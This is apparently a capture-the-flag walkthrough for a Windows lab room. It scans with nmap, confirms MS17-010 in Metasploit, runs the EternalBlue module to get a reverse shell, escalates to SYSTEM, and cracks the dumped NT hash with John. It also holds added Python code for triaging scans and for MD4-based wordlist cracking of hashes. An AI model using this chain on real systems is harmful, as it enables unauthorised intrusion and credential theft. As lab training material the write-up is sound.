Blue
Deploy and hack into a Windows machine, leveraging common misconfiguration issues.
Scanning
nmap -sV --script vuln $IP
Options:
-sV – probes the version of each running service
--script vuln – runs the NSE vulnerability-detection scripts, whose output we need to answer the room's questions
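Triaging the scan output by hand works for one host, but the same scan saved with `-oX scan.xml` can be parsed so that only hosts the `smb-vuln-ms17-010` script flagged as vulnerable are reported. The following is an added example, not part of the original writeup: the XML is a constructed sample that follows the layout nmap's `vulns` NSE library writes (a `table` per vulnerability id with `title`/`state` elements and an `ids` sub-table), and it assumes the scan was run with `--script-args vulns.showall` so that a patched host still produces a `NOT VULNERABLE` entry.

```python
"""Triage an nmap `--script vuln` XML report for MS17-010 findings.

Added example (not part of the original writeup). Assumes the scan was saved
with `-oX scan.xml` and run with `--script-args vulns.showall`. The XML below
is a constructed sample in the layout of nmap's `vulns` NSE library; the
addresses are invented for this example.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample: one vulnerable host, one patched host.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.11" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">NOT VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_vuln_findings(xml_text, script_prefix="smb-vuln-"):
    """Return one dict per vulnerability table emitted by a matching NSE script."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for script in host.iter("script"):
            sid = script.get("id", "")
            if not sid.startswith(script_prefix):
                continue
            # Each direct child <table> of the script is one vulnerability report.
            for vuln in script.findall("table"):
                state_el = vuln.find("elem[@key='state']")
                state = (state_el.text or "").strip() if state_el is not None else "UNKNOWN"
                title_el = vuln.find("elem[@key='title']")
                ids = [e.text for e in vuln.findall("table[@key='ids']/elem") if e.text]
                findings.append({
                    "host": addr,
                    "script": sid,
                    "id": vuln.get("key"),
                    "title": title_el.text if title_el is not None else "",
                    "state": state,
                    "ids": ids,
                    # "NOT VULNERABLE" must not match; "VULNERABLE (Exploitable)"
                    # and "LIKELY VULNERABLE" should.
                    "vulnerable": state.startswith(("VULNERABLE", "LIKELY")),
                })
    return findings


def ms17_010_hosts(findings):
    """Sorted list of hosts the smb-vuln-ms17-010 script reported as vulnerable."""
    return sorted({f["host"] for f in findings
                   if f["script"] == "smb-vuln-ms17-010" and f["vulnerable"]})


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    results = parse_vuln_findings(text)
    for f in results:
        print(f"{f['host']:15} {f['script']:22} {f['state']}")
    print("MS17-010 vulnerable:", ", ".join(ms17_010_hosts(results)) or "none")
```

Run it with the path to a real `-oX` report as the first argument; with no argument it parses the constructed sample and prints only 10.10.10.10 as vulnerable. A `NOT VULNERABLE` or `UNKNOWN` state is deliberately excluded, so a host that merely has SMB exposed is not mistaken for a confirmed finding.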
Exploit
I won't paste the whole output; we are only interested in the ms17-010 finding. Now let's open Metasploit and confirm whether the host is vulnerable:
msfconsole
Now we use the command search to find the module that we want:
search eternal
Having found it, let's use it:
use auxiliary/scanner/smb/smb_ms17_010
Now we need to specify the rhost (the target):
set rhost $IP
#to run the module, type:
run
Output: the module reports the host as vulnerable. Sweet, now we can use the EternalBlue exploit:
#type this to deselect the current module:
back
#now for the new module:
use exploit/windows/smb/ms17_010_eternalblue
Let’s see the options that we need to specify:
options
Let's specify the rhost and lhost and we are good to go:
#target's ip
set rhost $IP
#your own ip (or interface), where the reverse shell connects back to:
set lhost tun0
run
And we are in:
Now we can migrate our process into another one that is running as “NT AUTHORITY\SYSTEM”:
First type “getsystem” in the meterpreter session to elevate our privileges so that the migration is allowed. Then type:
#PID of the SYSTEM process you chose:
migrate $PID
Now we can dump the hash and crack it:
echo "#thehashyoufound" > hash.hash
Now we can use John the Ripper to crack the NT hash:
john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
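The reason john finishes this in seconds is worth seeing in code: Windows stores the NT hash as MD4 over the UTF-16LE encoding of the password, with no salt and no work factor, so testing a wordlist entry costs a single MD4 call and the same hash can be matched against any wordlist offline. The block below is an added example, not part of the original writeup: it implements MD4 in pure Python (hashlib's md4 is frequently unavailable on modern OpenSSL builds), checks it against the published MD4 and NT test vectors, and audits a constructed `hashdump`-style line against a small constructed wordlist. The account name, hash line and wordlist are all invented here.

```python
"""Why an NT hash from hashdump falls to a wordlist in seconds.

Added example, not from the original writeup. NT hash = MD4(UTF-16LE(password)):
unsalted and with no work factor. MD4 is implemented in pure Python below
(RFC 1320); the hashdump line and wordlist are constructed for this example.
"""
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _f(x, y, z):
    return (x & y) | ((~x & _MASK) & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# (round function, additive constant, per-step shifts, message word order)
_ROUNDS = (
    (_f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
    (_g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
    (_h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
)


def md4(data: bytes) -> bytes:
    """MD4 digest per RFC 1320 (little-endian words, 64-byte blocks)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)      # pad to 56 mod 64
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for func, k, shifts, order in _ROUNDS:
            for i, idx in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[idx] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c                  # rotate the working registers
        a0, b0, c0, d0 = ((a0 + a) & _MASK, (b0 + b) & _MASK,
                          (c0 + c) & _MASK, (d0 + d) & _MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 of the UTF-16LE password, hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


def nt_hash_from_hashdump(line: str) -> str:
    """Extract the NT hash from a `user:rid:lmhash:nthash:::` hashdump line."""
    return line.split(":")[3].lower()


def match_against_wordlist(target_hex: str, candidates):
    """Return the first candidate whose NT hash equals target_hex, else None."""
    target = target_hex.lower()
    for word in candidates:
        if nt_hash(word) == target:
            return word
    return None


# Constructed sample input (account name, RID and hash invented; the NT value
# is the well-known hash of "password").
SAMPLE_HASHDUMP_LINE = "sampleuser:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"
SAMPLE_WORDLIST = ["letmein", "123456", "qwerty", "password", "welcome1"]

if __name__ == "__main__":
    assert md4(b"abc").hex() == "a448017aaf21d8525fc10ae87aa6729d"   # RFC 1320 vector
    target = nt_hash_from_hashdump(SAMPLE_HASHDUMP_LINE)
    print("NT hash:", target)
    print("matched:", match_against_wordlist(target, SAMPLE_WORDLIST))
```

Every entry costs one MD4 over a few bytes, which is why a multi-million-entry wordlist such as rockyou is exhausted almost instantly; the only defences are passwords that are not in such lists and not exposing the hashes in the first place (patching MS17-010, disabling SMBv1, and limiting who can reach SYSTEM).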
The flags are located in the following directories:
C:\ – flag1
C:\Windows\System32\config – flag2
C:\Users\Jon\Documents – flag3